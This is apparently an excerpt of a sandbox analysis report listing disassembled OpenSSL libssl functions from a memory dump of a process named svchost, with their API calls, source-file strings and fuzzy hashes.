                                                                                              Function 00007FFBAB426A90 Relevance: 42.5, APIs: 20, Strings: 4, Instructions: 486COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426AE2
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426AFA
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426B0C
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426B29
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426B41
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426D6B
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426D7F
                                                                                              • OPENSSL_sk_new_reserve.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426DB7
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426DC8
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426DE0
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426DF1
                                                                                              • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426E19
                                                                                              • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426F6D
                                                                                              • OSSL_PARAM_construct_end.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426F96
                                                                                              • X509_VERIFY_PARAM_get_depth.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB42707D
                                                                                              • X509_VERIFY_PARAM_set_depth.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB4270C7
                                                                                              • CRYPTO_dup_ex_data.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB427124
                                                                                              • X509_VERIFY_PARAM_inherit.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB427192
                                                                                              • OPENSSL_sk_dup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB4271A3
                                                                                              • OPENSSL_sk_dup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB4271C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugX509_$L_sk_dupL_sk_numR_set_error$L_sk_new_reserveL_sk_valueM_construct_endM_construct_intM_get_depthM_inheritM_set_depthO_dup_ex_data
                                                                                              • String ID: SSL_new$read_ahead$ssl\ssl_lib.c$ssl_dane_dup
                                                                                              • API String ID: 2291486214-3332040259
                                                                                              • Opcode ID: 9278c32fdcb4760945533fc4528d50aab5ecc26abcec242680b99fced4bff74e
                                                                                              • Instruction ID: c0c6b5bf84e73a37d2b761e24fdc375c35dc96b9d2e6a37d6027c5f04aefb605
                                                                                              • Opcode Fuzzy Hash: 9278c32fdcb4760945533fc4528d50aab5ecc26abcec242680b99fced4bff74e
                                                                                              • Instruction Fuzzy Hash: E6225CB2A0A68285FB669F36D4907B933A4FF54B84F048435CE6D477A6DF39E844D700
                                                                                              Function 00007FFBAB496190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 275COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496261
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496279
                                                                                              • CRYPTO_memcmp.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB49629B
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4962A4
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4962B4
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4962C0
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496368
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496380
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496390
                                                                                              • d2i_PUBKEY_ex.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4963D8
                                                                                              • EVP_PKEY_missing_parameters.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4963FB
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496404
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB49641C
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496469
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496481
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB49656F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB49657B
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4965AB
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4965D8
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4965E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$O_freeO_memcmpY_exY_freeY_missing_parametersd2i_
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_process_rpk
                                                                                              • API String ID: 2574011182-3798400865
                                                                                              • Opcode ID: 6f241ae834e0f5e969e3fdeae8b107c3cc6316ff65a60cb2fa840de97d3a40a9
                                                                                              • Instruction ID: 4ee473d32bca475201dc6214ed7a817d445f9c1a8131f61c899d893c570f6a67
                                                                                              • Opcode Fuzzy Hash: 6f241ae834e0f5e969e3fdeae8b107c3cc6316ff65a60cb2fa840de97d3a40a9
                                                                                              • Instruction Fuzzy Hash: 04C190A2A0E68281FB62DB76E5803BD6391EB44794F10C135EE7D826E5DF3CE495C701
                                                                                              Function 00007FFBAB49C280 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 184COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_errorX_free
                                                                                              • String ID: $ $ssl\statem\statem_srvr.c$tls_process_cke_gost18
                                                                                              • API String ID: 69550846-3863225748
                                                                                              • Opcode ID: 00d8c6dc8efc5c8ef4ecaa0cfa2a26c64706626428e821f2e2f0224a3dd28f48
                                                                                              • Instruction ID: de0aa74ab27c9a6e4a2e08871e55be1a2730b72be1e9b51ddb08b840778af08c
                                                                                              • Opcode Fuzzy Hash: 00d8c6dc8efc5c8ef4ecaa0cfa2a26c64706626428e821f2e2f0224a3dd28f48
                                                                                              • Instruction Fuzzy Hash: BB815FB1A1E64281F662EB72E8917FD2351BF84B80F408432EE2D476B7DE7CE5488750
                                                                                              Function 00007FFBAB41AB80 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 307COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ABF6
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC0E
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC20
                                                                                              • ASN1_item_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC2F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC82
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC9A
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ACC3
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ACDB
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AD45
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AD7F
                                                                                              • X509_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ADDB
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ADF6
                                                                                              • d2i_PUBKEY_ex.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AE31
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AE6D
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AEFB
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AF41
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AF59
                                                                                                • Part of subcall function 00007FFBAB41B500: CRYPTO_free.LIBCRYPTO-3-X64(00000000,00007FFBAB41AE9A,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41B52E
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AFC4
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41B02D
                                                                                              • ASN1_item_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41B07F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeR_newR_set_debug$memcpy$N1_item_free$R_set_errorX509_freeY_exY_freed2i_
                                                                                              • String ID: d2i_SSL_SESSION_ex$ssl\ssl_asn1.c
                                                                                              • API String ID: 3345805239-3787699099
                                                                                              • Opcode ID: 08c168e653102878f2f672e4712d67bdc309429c95d44fbb4e96ba3687ef8e26
                                                                                              • Instruction ID: 5d24aefca9dfa04bc790ca2b2c876bb5212cd1822cf251e02ffa541eff8dcef5
                                                                                              • Opcode Fuzzy Hash: 08c168e653102878f2f672e4712d67bdc309429c95d44fbb4e96ba3687ef8e26
                                                                                              • Instruction Fuzzy Hash: 54E12DB2A0AB8692EB669F35E4812B937A4FB44B44F088036DE6D477B5DF38E454C310
                                                                                              Function 00007FFBAB4667D1 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printf$O_puts$O_freeO_zalloc
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Ack delay (raw) %llu$ Ack range count: %llu$ Ack range len: %llu$ First ack range: %llu$ Gap: %llu$ Largest acked: %llu$ (with ECN)$ (without ECN)$Ack $ssl\quic\quic_trace.c
                                                                                              • API String ID: 1392080105-452490795
                                                                                              • Opcode ID: aaea0fa10fea37a6471be535342dd04dbe935009f4cd36361e677d794d860f6a
                                                                                              • Instruction ID: da3ddb7f3bd162c60c33f71e5c4fe73d423215620d2fe7fe71816c8f1813262d
                                                                                              • Opcode Fuzzy Hash: aaea0fa10fea37a6471be535342dd04dbe935009f4cd36361e677d794d860f6a
                                                                                              • Instruction Fuzzy Hash: 1B416AA2B0A75294FE22DBB5D8602FC2761FB44B94F44903ACE2D176A5DE3CE44AC340
                                                                                              Function 00007FFBAB42E9C0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\ssl_lib.c$ssl_cache_cipherlist
                                                                                              • API String ID: 4275876640-878095499
                                                                                              • Opcode ID: 9d6e9ff241596d830fe551f836550e6429d03e1f2991cc0af5c0d4a8b6431be4
                                                                                              • Instruction ID: 9aadbb78b6f141a33fae9b5e0cf28e863564a2849f6345c589399098dfc11793
                                                                                              • Opcode Fuzzy Hash: 9d6e9ff241596d830fe551f836550e6429d03e1f2991cc0af5c0d4a8b6431be4
                                                                                              • Instruction Fuzzy Hash: C771C0B1A0AB8281EB62DF72D4916F93365EF54784F448035DE6D47ABAEF3CE2458301
                                                                                              Function 00007FFBAB434A20 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 151COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_unlock$D_read_lock$memset
                                                                                              • String ID: ssl\ssl_sess.c$ssl_generate_session_id
                                                                                              • API String ID: 3158670085-908510661
                                                                                              • Opcode ID: 4a2608fc511d51f38a49b1eb859a161b0b8407680a5219e0000badd70b6623ca
                                                                                              • Instruction ID: a5e09ce424f8afa97c738c4a2ac8f76883d3b85523db2e6b3259deaed44652be
                                                                                              • Opcode Fuzzy Hash: 4a2608fc511d51f38a49b1eb859a161b0b8407680a5219e0000badd70b6623ca
                                                                                              • Instruction Fuzzy Hash: 4E61D3B2B1A54281F766DB36E8916FD2360EF84784F588031DE2D47AF5DF2CE5858700
                                                                                              Function 00007FFBAB411030 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$EnvironmentVariable$freemalloc$O_freeO_mallocgetenv
                                                                                              • String ID: OPENSSL_WIN32_UTF8$crypto\getenv.c
                                                                                              • API String ID: 961399396-38007710
                                                                                              • Opcode ID: 7bafd972a445d01b9677d38324dda73a783f8ed59ccde74f62ef29f0471c9999
                                                                                              • Instruction ID: 3baeb777bd3928257f30dd1501f4fb3dd9ebd3dec0a068d4f6ec9f5b31d7faea
                                                                                              • Opcode Fuzzy Hash: 7bafd972a445d01b9677d38324dda73a783f8ed59ccde74f62ef29f0471c9999
                                                                                              • Instruction Fuzzy Hash: DC81C2A2F0AA4286FB269B36E85117966D5BF44BE0F448636DE3D57BE4EF3CD4049300
                                                                                              Function 00007FFBAB486A30 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 171COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$O_free$O_memcmpO_strndupmemchr
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\statem\extensions_srvr.c$tls_parse_ctos_server_name
                                                                                              • API String ID: 780431574-3519811762
                                                                                              • Opcode ID: 859949db2d3d7faf1b77a08b5c303842377056ef0c836e65578dac2b5671074e
                                                                                              • Instruction ID: 07b6f65bd3b18c879ddc12323469e748630105a12ab2f9722a2a5a12657d4b07
                                                                                              • Opcode Fuzzy Hash: 859949db2d3d7faf1b77a08b5c303842377056ef0c836e65578dac2b5671074e
                                                                                              • Instruction Fuzzy Hash: F971BDA2E0E69281FBA29BB5D4513BD63A1EF44788F44C436DE6C476B6DE3CE584C700
                                                                                              Function 00007FFBAB444A60 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: N_clear_free$R_newR_set_debug$O_clear_freeO_malloc
                                                                                              • String ID: srp_generate_client_master_secret$ssl\tls_srp.c
                                                                                              • API String ID: 2561172722-329117511
                                                                                              • Opcode ID: fa1b1ddf2f1494409767827b86814f9e7f048f390c60cbe00c7152a546646e22
                                                                                              • Instruction ID: 90d34487345f06580255b8b736868db74dd66e3c60565c2dad992f4f7cb50cd9
                                                                                              • Opcode Fuzzy Hash: fa1b1ddf2f1494409767827b86814f9e7f048f390c60cbe00c7152a546646e22
                                                                                              • Instruction Fuzzy Hash: 6561B4B5B0A74281E62AEB72D4A16BE6350FF45BC4F848435DE2E477A2DF3CE1558300
                                                                                              Function 00007FFBAB463040 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RAND_priv_bytes_ex.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46307B
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463097
                                                                                              • EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630B5
                                                                                              • EVP_CIPHER_CTX_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630C6
                                                                                              • EVP_CIPHER_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630FE
                                                                                              • OPENSSL_LH_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463113
                                                                                              • OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46313C
                                                                                              • OPENSSL_LH_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463158
                                                                                              • OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46317A
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463191
                                                                                              • OPENSSL_LH_doall.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631A6
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631AF
                                                                                              • EVP_CIPHER_CTX_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631B7
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631CC
                                                                                              • EVP_CIPHER_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
